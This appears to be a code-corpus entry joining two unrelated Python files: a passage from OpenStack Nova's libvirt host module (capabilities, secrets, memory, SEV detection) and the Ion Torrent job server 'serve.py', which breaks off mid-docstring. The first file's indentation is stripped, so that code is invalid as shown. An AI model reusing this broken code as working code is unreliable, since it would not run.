if six.PY3 and isinstance(xml_str, six.binary_type):
xml_str = xml_str.decode('utf-8')
features = self.get_connection().baselineCPU(
[xml_str],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support full set"
" of host capabilities: %(error)s",
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_domain_capabilities(self):
"""Returns the capabilities you can request when creating a
domain (VM) with that hypervisor, for various combinations of
architecture and machine type.
In this context the fuzzy word "hypervisor" implies QEMU
binary, libvirt itself and the host config. libvirt provides
this in order that callers can determine what the underlying
emulator and/or libvirt is capable of, prior to creating a domain
(for instance via virDomainCreateXML or virDomainDefineXML).
However nova needs to know the capabilities much earlier, when
the host's compute service is first initialised, in order that
placement decisions can be made across many compute hosts.
Therefore this is expected to be called during the init_host()
phase of the driver lifecycle rather than just before booting
an instance.
This causes an additional complication since the Python
binding for this libvirt API call requires the architecture
and machine type to be provided. So in order to gain a full
picture of the hypervisor's capabilities, technically we need
to call it with the right parameters, once for each
(architecture, machine_type) combination which we care about.
However the libvirt experts have advised us that in practice
the domain capabilities do not (yet, at least) vary enough
across machine types to justify the cost of calling
getDomainCapabilities() once for every single (architecture,
machine_type) combination. In particular, SEV support isn't
reported per-machine type, and since there are usually many
machine types, we heed the advice of the experts that it's
typically sufficient to call it once per host architecture:
https://bugzilla.redhat.com/show_bug.cgi?id=1683471#c7
However, that's not quite sufficient in the context of nova,
because SEV guests typically require a q35 machine type, as do
KVM/QEMU guests that want Secure Boot, whereas the current
default machine type for x86_64 is 'pc'. So we need results
from the getDomainCapabilities API for at least those two.
Fortunately we can take advantage of the results from the
getCapabilities API which marks selected machine types as
canonical, e.g.:
<machine canonical='pc-i440fx-2.11' maxCpus='255'>pc</machine>
<machine canonical='pc-q35-2.11' maxCpus='288'>q35</machine>
So for now, we call getDomainCapabilities for these canonical
machine types of each architecture, plus for the
architecture's default machine type, if that is not one of the
canonical types.
Future domain capabilities might report SEV in a more
fine-grained manner, and we also expect to use this method to
detect other features, such as for gracefully handling machine
types and potentially for detecting OVMF binaries. Therefore
we memoize the results of the API calls in a nested dict where
the top-level keys are architectures, and second-level keys
are machine types, in order to allow easy expansion later.
Whenever libvirt/QEMU are updated, cached domCapabilities
would get outdated (because QEMU will contain new features and
the capabilities will vary). However, this should not be a
problem here, because when libvirt/QEMU gets updated, the
nova-compute agent also needs restarting, at which point the
memoization will vanish because it's not persisted to disk.
Note: The result is cached in the member attribute
_domain_caps.
:returns: a nested dict of dicts which maps architectures to
machine types to instances of config.LibvirtConfigDomainCaps
representing the domain capabilities of the host for that arch
and machine type:
{ arch:
{ machine_type: LibvirtConfigDomainCaps }
}
"""
if self._domain_caps:
return self._domain_caps
domain_caps = defaultdict(dict)
caps = self.get_capabilities()
virt_type = CONF.libvirt.virt_type
for guest in caps.guests:
arch = guest.arch
domain = guest.domains.get(virt_type, guest.default_domain)
for machine_type in self._get_machine_types(arch, domain):
# It is expected that if there are multiple <guest>
# elements, each will have a different architecture;
# for example, on x86 hosts one <guest> will contain
# <arch name='i686'> and one will contain <arch
# name='x86_64'>. But it doesn't hurt to add a safety
# net to avoid needlessly calling libvirt's API more
# times than we need.
if machine_type and machine_type in domain_caps[arch]:
continue
self._add_to_domain_capabilities(domain.emulator, arch,
domain_caps, machine_type,
virt_type)
# NOTE(aspiers): Use a temporary variable to update the
# instance variable atomically, otherwise if some API
# calls succeeded and then one failed, we might
# accidentally memoize a partial result.
self._domain_caps = domain_caps
return self._domain_caps
def _get_machine_types(self, arch, domain):
"""Get the machine types for this architecture for which we need to
call getDomainCapabilities, i.e. the canonical machine types,
and the default machine type (if it's not one of the canonical
machine types).
See the docstring for get_domain_capabilities() for an explanation
of why we choose this set of machine types.
"""
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# See _add_to_domain_capabilities() below for how this is handled.
mtypes = set([libvirt_utils.get_default_machine_type(arch)])
mtypes.update(domain.aliases.keys())
LOG.debug("Getting domain capabilities for %(arch)s via "
"machine types: %(mtypes)s",
{'arch': arch, 'mtypes': mtypes})
return mtypes
def _add_to_domain_capabilities(self, emulator_bin, arch, domain_caps,
machine_type, virt_type):
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# In that case we pass a machine_type of None to the libvirt
# API and rely on it choosing a sensible default which will be
# returned in the <machine> element. It could also be an
# alias like 'pc' rather than a full machine type.
#
# NOTE(kchamart): Prior to libvirt v4.7.0 libvirt picked its
# default machine type for x86, 'pc', as reported by QEMU's
# default. From libvirt v4.7.0 onwards, libvirt _explicitly_
# declared the "preferred" default for x86 as 'pc' (and
# appropriate values for other architectures), and only uses
# QEMU's reported default (whatever that may be) if 'pc' does
# not exist. This was done "to isolate applications from
# hypervisor changes that may cause incompatibilities" --
# i.e. if, or when, QEMU changes its default machine type to
# something else. Refer to this libvirt commit:
#
# https://libvirt.org/git/?p=libvirt.git;a=commit;h=26cfb1a3
try:
cap_obj = self._get_domain_capabilities(
emulator_bin=emulator_bin, arch=arch,
machine_type=machine_type, virt_type=virt_type)
except libvirt.libvirtError as ex:
# NOTE(sean-k-mooney): This can happen for several
# reasons, but one common example is if you have
# multiple QEMU emulators installed and you set
# virt-type=kvm. In this case any non-native emulator,
# e.g. AArch64 on an x86 host, will (correctly) raise
# an exception as KVM cannot be used to accelerate CPU
# instructions for non-native architectures.
error_code = ex.get_error_code()
LOG.debug(
"Error from libvirt when retrieving domain capabilities "
"for arch %(arch)s / virt_type %(virt_type)s / "
"machine_type %(mach_type)s: "
"[Error Code %(error_code)s]: %(exception)s",
{'arch': arch, 'virt_type': virt_type,
'mach_type': machine_type, 'error_code': error_code,
'exception': ex})
# Remove archs added by default dict lookup when checking
            # if the machine type has already been recorded.
if arch in domain_caps:
domain_caps.pop(arch)
return
# Register the domain caps using the expanded form of
# machine type returned by libvirt in the <machine>
# element (e.g. pc-i440fx-2.11)
if cap_obj.machine_type:
domain_caps[arch][cap_obj.machine_type] = cap_obj
else:
# NOTE(aspiers): In theory this should never happen,
# but better safe than sorry.
LOG.warning(
"libvirt getDomainCapabilities("
"emulator_bin=%(emulator_bin)s, arch=%(arch)s, "
"machine_type=%(machine_type)s, virt_type=%(virt_type)s) "
"returned null <machine> type",
{'emulator_bin': emulator_bin, 'arch': arch,
'machine_type': machine_type, 'virt_type': virt_type}
)
# And if we passed an alias, register the domain caps
# under that too.
if machine_type and machine_type != cap_obj.machine_type:
domain_caps[arch][machine_type] = cap_obj
cap_obj.machine_type_alias = machine_type
def _get_domain_capabilities(self, emulator_bin=None, arch=None,
machine_type=None, virt_type=None, flags=0):
xmlstr = self.get_connection().getDomainCapabilities(
emulator_bin,
arch,
machine_type,
virt_type,
flags
)
LOG.debug("Libvirt host hypervisor capabilities for arch=%s and "
"machine_type=%s:\n%s", arch, machine_type, xmlstr)
caps = vconfig.LibvirtConfigDomainCaps()
caps.parse_str(xmlstr)
return caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.',
{'old': self._hostname, 'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s', xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error('Error defining a secret with XML: %s', xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_cpu_count(self):
"""Returns the total numbers of cpu in the host."""
return self._get_hardware_info()[2]
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
if CONF.libvirt.file_backed_memory > 0:
return CONF.libvirt.file_backed_memory
else:
return self._get_hardware_info()[1]
def _sum_domain_memory_mb(self, include_host=True):
"""Get the total memory consumed by guest domains
        If include_host is True, subtract the available host memory from the
        memory reported for domain 0 to get the real memory used by dom0 under Xen.
"""
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info()[2])
except libvirt.libvirtError as e:
LOG.warning("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s",
{"uuid": guest.uuid, "ex": e})
continue
if include_host and guest.id == 0:
# Memory usage for the host domain (dom0 in xen) is the
# reported memory minus available memory
used += (dom_mem - self._get_avail_memory_kb())
else:
used += dom_mem
# Convert it to MB
return used // units.Ki
@staticmethod
def _get_avail_memory_kb():
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
avail = int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1])
return avail
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
if CONF.libvirt.virt_type == 'xen':
            # For xen, report the sum of all domains, including the host (dom0)
return self._sum_domain_memory_mb(include_host=True)
elif CONF.libvirt.file_backed_memory > 0:
# For file_backed_memory, report the total usage of guests,
# ignoring host memory
return self._sum_domain_memory_mb(include_host=False)
else:
return (self.get_memory_mb_total() -
(self._get_avail_memory_kb() // units.Ki))
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
        # Index 3 of the returned tuple is the CPU frequency (MHz).
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: an instance of Guest
"""
if six.PY2:
xml = encodeutils.safe_encode(xml)
domain = self.get_connection().defineXML(xml)
return libvirt_guest.Guest(domain)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
# TODO(sbauza): Replace that call by a generic _list_devices("pci")
return self.get_connection().listDevices("pci", flags)
def list_mdev_capable_devices(self, flags=0):
"""Lookup devices supporting mdev capabilities.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev_types", flags=flags)
def list_mediated_devices(self, flags=0):
"""Lookup mediated devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev", flags=flags)
def _list_devices(self, cap, flags=0):
"""Lookup devices.
:returns: a list of virNodeDevice instance
"""
try:
return self.get_connection().listDevices(cap, flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support "
"listDevices: %(error)s",
{'uri': self._uri, 'error': ex})
return []
else:
raise
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
# mount options and split options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
def _kernel_supports_amd_sev(self):
if not os.path.exists(SEV_KERNEL_PARAM_FILE):
LOG.debug("%s does not exist", SEV_KERNEL_PARAM_FILE)
return False
with open(SEV_KERNEL_PARAM_FILE) as f:
contents = f.read()
LOG.debug("%s contains [%s]", SEV_KERNEL_PARAM_FILE, contents)
return contents == "1\n"
@property
def supports_amd_sev(self):
"""Returns a boolean indicating whether AMD SEV (Secure Encrypted
Virtualization) is supported. This is conditional on support
in the hardware, kernel, qemu, and libvirt.
The result is memoized, since it is not expected to change
during the lifetime of a running nova-compute service; if the
hypervisor stack is changed or reconfigured in a way which
would affect the support, nova-compute should be restarted
anyway.
"""
if self._supports_amd_sev is None:
self._set_amd_sev_support()
return self._supports_amd_sev
def _set_amd_sev_support(self):
self._supports_amd_sev = False
if not self._kernel_supports_amd_sev():
LOG.info("kernel doesn't support AMD SEV")
self._supports_amd_sev = False
return
domain_caps = self.get_domain_capabilities()
for arch in domain_caps:
for machine_type in domain_caps[arch]:
LOG.debug("Checking SEV support for arch %s "
"and machine type %s", arch, machine_type)
for feature in domain_caps[arch][machine_type].features:
feature_is_sev = isinstance(
feature, vconfig.LibvirtConfigDomainCapsFeatureSev)
if (feature_is_sev and feature.supported):
LOG.info("AMD SEV support detected")
self._supports_amd_sev = True
return
LOG.debug("No AMD SEV support detected for any (arch, machine_type)")
|
serve.py
|
#!/usr/bin/env python
# Copyright (C) 2010 Ion Torrent Systems, Inc. All Rights Reserved
"""
Ion Job Server
==============
The Job Server connects the Torrent PC Analysis frontend to the
compute infrastructure that performs actual data analysis. It is a
tool for monitoring and managing the computational tasks required
for Ion data analysis.
The job server can either submit jobs to a DRMAA-compatible grid
resource management system (currently only Sun Grid Engine is supported),
or it can execute jobs locally by spawning analysis processes itself. The
job server's behavior is determined first by the ``SGE_ENABLED`` setting
in `settings.py`. If ``SGE_ENABLED`` is ``True``, then the job server will try
the following:
#. Check for environment variables. If any of these environment variables
are not set, the job server will attempt to extract them from `settings.py`.
* ``SGE_ROOT``
* ``SGE_CELL``
* ``SGE_CLUSTER_NAME``
* ``SGE_QMASTER_PORT``
* ``SGE_EXECD_PORT``
#. Import the python-drmaa package. This package can be installed using
`setuptools`. It also requires that libdrmaa be installed. On Ubuntu,
this can be installed with ``sudo apt-get install libdrmaa1.0``.
#. Contact the SGE Master.
If either of the first two steps fails, it will fail silently, and the
job server will revert to local-only mode. If the job server fails to
contact the SGE Master (for example, because the ``SGE_QMASTER_PORT`` is
blocked), the job server will raise an exception and terminate.
This module requires Twisted's XMLRPC server. On Ubuntu, this can be installed
with ``sudo apt-get install python-twisted``.
"""
import datetime
import json
import os
from os import path
import re
import signal
import subprocess
import sys
import threading
import traceback
import logging
from logging import handlers
from twisted.web import xmlrpc, server
# for tmap queue
from twisted.internet import reactor
LOG_FILENAME = "/var/log/ion/jobserver.log"
logger = logging.getLogger(__name__)
logger.propagate = False
logger.setLevel(logging.INFO)
rothandle = logging.handlers.RotatingFileHandler(
LOG_FILENAME, maxBytes=1024 * 1024 * 10, backupCount=5
)
cachehandle = logging.handlers.MemoryHandler(1024, logging.ERROR, rothandle)
fmt = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s")
rothandle.setFormatter(fmt)
logger.addHandler(rothandle)
logger.addHandler(cachehandle)
REFERENCE_LIBRARY_TEMP_DIR = "/results/referenceLibrary/temp/"
import iondb.anaserve.djangoinit
# from iondb.bin import djangoinit
# from iondb.rundb import models
try:
import iondb.version as version # @UnresolvedImport
GITHASH = version.IonVersionGetGitHash()
except Exception:
GITHASH = ""
__version__ = GITHASH
# local settings
try:
sys.path.append(path.dirname(path.dirname(__file__)))
from django.conf import settings
except ImportError:
sys.path.pop()
sys.path.append("../")
try:
from django.conf import settings
except ImportError:
sys.path.pop()
# distributed resource management
try:
# We want to determine if we have the ability to make calls to the
# drmaa interface. In order to do so, we first need to set environment
# variables.
if not settings.SGE_ENABLED:
# bail if SGE (currently the only supported drmaa target) is
# disabled from the site settings file.
raise ImportError
# Set env. vars necessary to talk to SGE. The SGE root contains files
# describing where the grid master lives. The other variables determine
# which of several possible grid masters to talk to.
for k in (
"SGE_ROOT",
"SGE_CELL",
"SGE_CLUSTER_NAME",
"SGE_QMASTER_PORT",
"SGE_EXECD_PORT",
"DRMAA_LIBRARY_PATH",
):
print("DEBUG: " + k)
logger.info(k)
        if k not in os.environ:
print("DEBUG: " + str(getattr(settings, k)))
logger.info(str(getattr(settings, k)))
os.environ[k] = str(getattr(settings, k))
try:
import drmaa
except RuntimeError:
# drmaa will sometimes raise RuntimeError if libdrmaa1.0 is not
# installed.
logger.error("libdrmaa1.0 may not be installed")
raise ImportError
import atexit # provides cleanup of the session object
try:
HAVE_DRMAA = True
# create a single drmaa session
_session = drmaa.Session()
try:
_session.initialize()
logger.info("DRMAA session initialized")
except Exception as err:
logger.exception("Failed to initialize DRMAA session")
atexit.register(_session.exit)
djs = drmaa.JobState
# globally define some status messages
_decodestatus = {
djs.UNDETERMINED: "process status cannot be determined",
djs.QUEUED_ACTIVE: "job is queued and active",
djs.SYSTEM_ON_HOLD: "job is queued and in system hold",
djs.USER_ON_HOLD: "job is queued and in user hold",
djs.USER_SYSTEM_ON_HOLD: ("job is queued and in user " "and system hold"),
djs.RUNNING: "job is running",
djs.SYSTEM_SUSPENDED: "job is system suspended",
djs.USER_SUSPENDED: "job is user suspended",
djs.DONE: "job finished normally",
djs.FAILED: "job finished, but failed",
}
InvalidJob = drmaa.errors.InvalidJobException
except drmaa.errors.InternalException as err:
logger.error("DRMAA import failed, potential config problem: %s" % err)
# If we successfully import drmaa, but it somehow wasn't configured
# properly, we will gracefully bail by raising ImportError
raise ImportError
except (ImportError, AttributeError):
logger.error("Bailed during DRMAA set-up")
# drmaa import failed
HAVE_DRMAA = False
InvalidJob = ValueError
# regexps
SCRIPTNAME_RE = re.compile(r"^ion_analysis_(\d+)\.py$")
# utility functions
def index2scriptname(index):
return "ion_analysis_%02d.py" % index
def index2paramsname(index):
return "ion_params_%02d.json" % index
def safewrite(fname, s):
outfile = None
try:
outfile = open(fname, "w")
outfile.write(s.encode("UTF-8"))
finally:
if outfile is not None:
outfile.close()
def writeint(fname, n):
safewrite(fname, "%d" % n)
def have_drmaa(host):
return HAVE_DRMAA
class Analysis(object):
"""``Analysis`` objects capture the properties of a single running
analysis job. While ``Analysis`` is an abstract base class,
``DRMAnalysis`` and ``LocalAnalysis`` are the implementations for
grid mode and local mode, respectively.
Each analysis writes out a script file (passed in with the ``script``
argument), a parameters file (``params``),
and a list of miscellaneous files (``files``) needed for the analysis job.
It then spawns the analysis and
generates a proxy object which an ``AnalysisQueue`` object can use
to wait for a job to finish. Once the job has finished, the ``Analysis``
object handles cleanup.
The ``pk`` argument specifies a unique identifier for the job.
    The ``savePath`` argument specifies the working directory for the
analysis job.
``Analysis`` objects are also responsible for job control. Using the
``suspend()``, ``resume()``, and ``terminate()`` methods, a job can be
paused (suspended), resumed, or terminated.
"""
ANALYSIS_TYPE = ""
def __init__(
self, name, script, params, files, savePath, pk, chipType, chips, job_type
):
"""Initialize by storing essential parameters."""
super(Analysis, self).__init__()
self.name = name
self.script = script
self.params = params
self.savePath = savePath
self.chipType = chipType
self.pk = pk
self.chips = chips
for pair in files:
assert len(pair) == 2
for ele in pair:
assert isinstance(ele, (str, unicode))
self.files = files
self.job_type = job_type
def get_id(self):
"""Returns the running job's ID number given by the underlying
execution system.
If the job server is running in grid mode,
then the ID returned is a grid "job id," whereas if the job
server is running in local mode, it will be a process ID
number.
"""
return None
def status_string(self):
"""Return a message describing the state of the analysis. By
default, this will be an empty string."""
return ""
def initiate(self, rootdir):
"""Begin an analysis, and return a proxy object on which
the ``AnalysisQueue`` will wait."""
return None
def conclude(self, comm_result):
"""Clean up after an analysis has completed."""
return False
def suspend(self):
"""Suspend a job in progess. Returns ``True`` if the analysis
was successfully suspended, and otherwise it returns ``False``."""
return False
def resume(self):
"""Resume a suspended job. Returns ``True`` if the analysis was
        successfully resumed, otherwise it returns ``False``."""
return False
def terminate(self):
"""Terminate a job in progress. Returns ``True`` if the analysis
was successfully terminated, otherwise it returns ``False``."""
return False
    def _get_script_index(self, adir):
        # Collect the indices of any existing ion_analysis_NN.py scripts in `adir`
        # so that a re-run is written out under the next free index.
        matches = [SCRIPTNAME_RE.match(fn) for fn in os.listdir(adir)]
        inds = [int(m.group(1)) for m in matches if m]
        return (inds and max(inds) + 1) or 0
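    # Example (illustrative): with ion_analysis_00.py and ion_analysis_01.py left
    # over from earlier runs, the next call writes ion_analysis_02.py together
    # with ion_params_02.json.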
def _write_out(self, adir):
"""Dump out files needed for the analysis into directory 'adir'."""
# make sure we have params as JSON text
os.umask(0o0002)
if isinstance(self.params, dict):
self.params = json.dumps(self.params)
if not path.isdir(adir):
try:
os.makedirs(adir)
except Exception:
logger.error(
"Analysis cannot start. Failed to create directory: %s." % adir
)
logger.debug(traceback.format_exc())
return None, None
# find the appropriate script index, in case we are re-running
script_index = self._get_script_index(adir)
script_fname = path.join(adir, index2scriptname(script_index))
params_fname = path.join(adir, index2paramsname(script_index))
# dump out script and parameters
safewrite(script_fname, self.script)
os.chmod(script_fname, 0o0775)
safewrite(params_fname, self.params)
for name, content in self.files:
safewrite(path.join(adir, name), content)
manifest = "\n".join(name for name, content in self.files)
safewrite(path.join(adir, "manifest.txt"), manifest)
return script_fname, params_fname
def tolerate_invalid_job(fn):
"""Decorator to catch invalid job references and handle them silently."""
def ret(*args):
try:
result = fn(*args)
except InvalidJob:
logger.warning("Invalid job id requested: %s" % str(args))
result = False
return result
ret.func_name = fn.func_name
ret.__doc__ = fn.__doc__
return ret
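# A minimal sketch (not part of the original module) of how `tolerate_invalid_job`
# is meant to be used: a wrapped call that raises InvalidJob (drmaa's
# InvalidJobException in grid mode, ValueError in local mode) returns False
# instead of propagating the error. The helper below is hypothetical, assumes
# grid mode (so that `_session` exists), and is never called by this module.
@tolerate_invalid_job
def _example_job_status(jobid):
    """Sketch only: query the grid for `jobid`, or get False if the id is stale."""
    return _session.jobStatus(jobid)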
class DRMAnalysis(Analysis):
"""``DRMAnalysis`` implements analysis on Sun Grid Engine."""
ANALYSIS_TYPE = "grid"
class DRMWaiter(object):
"""Wrapper around a job id to allow the AnalysisQueue to .communicate()
with a grid job as if it were a process."""
def __init__(self, jobid, parent):
self.jobid = jobid
self.parent = parent
def communicate(self):
timeout = drmaa.Session.TIMEOUT_WAIT_FOREVER
try:
self.parent.retval = _session.wait(self.jobid, timeout)
except Exception as err:
logger.warning("Session wait exception: %s" % err)
self.parent.terminated = True
def __init__(
self, name, script, params, files, savePath, pk, chipType, chips, job_type
):
super(DRMAnalysis, self).__init__(
name, script, params, files, savePath, pk, chipType, chips, job_type
)
self.retval = None
self.jobid = None
self.terminated = False
def get_sge_params(self, chip_to_slots, chipType):
ret = "-pe ion_pe 1"
# ret = '-pe ion_pe 1 -l h_vmem=10000M'
for chip, args in chip_to_slots.items():
if chip in chipType:
ret = args.strip()
return ret
return ret
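    # Illustrative note: `chip_to_slots` (self.chips) is expected to map chip-name
    # substrings to raw SGE submission arguments, e.g. {"318": "-pe ion_pe 4"}
    # (hypothetical values); the first key contained in `chipType` wins, otherwise
    # the default "-pe ion_pe 1" is used.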
def initiate(self, rootdir):
"""Spawn an analysis on the grid.
Instructs the grid to capture the analysis script's standard output
and standard error in two files called ``drmaa_stdout.txt`` and
``drmaa_stderr.txt``, respectively.
"""
adir = path.join(self.savePath)
script_fname, params_fname = self._write_out(adir)
if script_fname is None:
return None
jt = _session.createJobTemplate()
qname = "tl.q"
if self.job_type == "thumbnail":
qname = "thumbnail.q"
# SGE
jt.nativeSpecification = "%s -w w -q %s" % (
self.get_sge_params(self.chips, self.chipType),
qname,
)
# TORQUE
# jt.nativeSpecification = ""
jt.remoteCommand = "python"
jt.workingDirectory = adir
jt.outputPath = ":" + path.join(adir, "drmaa_stdout.txt")
# jt.errorPath = ":" + path.join(adir, "drmaa_stderr.txt")
jt.args = (script_fname, params_fname)
jt.joinFiles = True # Merge stdout and stderr
self.jobid = _session.runJob(jt)
ret = self.DRMWaiter(self.jobid, self)
_session.deleteJobTemplate(jt)
return ret
def conclude(self, comm_result):
"""Clean up once a grid job finishes.
If the job completed successfully, writes out "1" into
a file ``status.txt`` in the job's working directory. THIS IS A BUG,
and instead should write out the job's exit status.
If the job was terminated, then the method writes "-1" instead.
"""
outpath = path.join(self.savePath, "status.txt")
if self.terminated:
writeint(outpath, -1)
return -1
else:
assert self.retval is not None
retcode = int(self.retval.hasExited)
writeint(outpath, retcode)
return retcode == 0
def _running(self):
return (self.jobid is not None) and (self.retval is None)
@tolerate_invalid_job
def suspend(self):
"""Suspends the job by issuing a command to the grid."""
if not self._running():
return False
_session.control(self.jobid, drmaa.JobControlAction.SUSPEND)
return True
@tolerate_invalid_job
def resume(self):
"""Resumes the job by issuing a command to the grid."""
if not self._running():
return False
_session.control(self.jobid, drmaa.JobControlAction.RESUME)
return True
@tolerate_invalid_job
def terminate(self):
"""Terminates the job by issuing a command to the grid."""
logger.info("DRMAA terminate job %s" % self.jobid)
if not self._running():
return False
joblistfile = os.path.join(self.savePath, "job_list.json")
if os.path.exists(joblistfile):
try:
with open(joblistfile) as f:
contents = json.load(f)
blocks = sum(
[list(block.values()) for block in list(contents.values())], []
)
for blockjobid in blocks:
try:
logger.debug(
"terminate job %s, status %s"
% (blockjobid, _session.jobStatus(blockjobid))
)
_session.control(blockjobid, drmaa.JobControlAction.TERMINATE)
except Exception:
logger.error("Failed to terminate %s" % blockjobid)
except Exception:
logger.error("DRMAA terminate error reading from %s" % joblistfile)
_session.control(self.jobid, drmaa.JobControlAction.TERMINATE)
return True
def get_id(self):
return self.jobid
def status_string(self):
unknown = "(unknown)"
try:
jid = _session.jobStatus(self.jobid)
except InvalidJob:
logger.warning("Querying status of unkown job: %s" % self.jobid)
return unknown
return _decodestatus.get(jid, unknown)
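# For reference (derived from initiate() above, not additional behaviour): with the
# defaults, a non-thumbnail job is submitted to queue tl.q with a native
# specification such as "-pe ion_pe 1 -w w -q tl.q", a job_type of "thumbnail" is
# routed to thumbnail.q instead, and stdout/stderr are merged (joinFiles=True) into
# drmaa_stdout.txt inside the job's working directory.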
class LocalAnalysis(Analysis):
"""Describes a local, non-grid analysis. Runs by spawning a process."""
ANALYSIS_TYPE = "local"
def __init__(
self, name, script, params, files, savePath, pk, chipType, chips, job_type
):
super(LocalAnalysis, self).__init__(
name, script, params, files, savePath, pk, chipType, chips, job_type
)
self.proc = None
def initiate(self, rootdir):
"""Initiates a local job by spawning a process directly.
Writes the process's PID to a file named ``pid`` in the
job's working directory. The returned proxy object is a
`subprocess.Popen` object.
"""
if self.proc is not None:
# we shouldn't run one analysis object more than once
return None
# determine where we will write out analysis files, and create it
adir = path.join(self.savePath)
script_fname, params_fname = self._write_out(adir)
args = (sys.executable, script_fname, params_fname)
# create process
self.proc = subprocess.Popen(args, cwd=adir)
# save PID
writeint(path.join(self.savePath, "pid"), self.proc.pid)
return self.proc
def conclude(self, comm_result):
"""
Concludes by writing the process's return code to ``status.txt`` in
the job's working directory.
"""
retcode = self.proc.returncode
assert retcode is not None
# save the return code to file in order to determine if the analysis
# completed successfully or not
writeint(path.join(self.savePath, "status.txt"), retcode)
return retcode == 0
def _running(self):
"""Determine if the analysis process is running."""
return self.proc and self.proc.returncode is None
def suspend(self):
"""Suspends the process by sending it ``SIGSTOP``."""
if not self._running():
return False
try:
self.proc.send_signal(signal.SIGSTOP)
except Exception:
logger.warning("SIGSTOP failed")
return False
return self._running()
def resume(self):
"""Resumes the process by sending it ``SIGCONT``."""
if not self._running():
return False
try:
self.proc.send_signal(signal.SIGCONT)
except Exception:
logger.warning("SIGCONT failed")
return False
return True
def terminate(self):
"""Terminates the process by calling ``subprocess.Popen``'s
``terminate()`` method.
"""
if not self._running():
return False
self.proc.terminate()
return True
def get_id(self):
if self.proc is None:
return None
return self.proc.pid
class AnalysisQueue(object):
"""
The ``AnalysisQueue`` is responsible for managing and monitoring
all jobs the job server is currently running. It is intended to be a
singleton object.
It maintains a queue
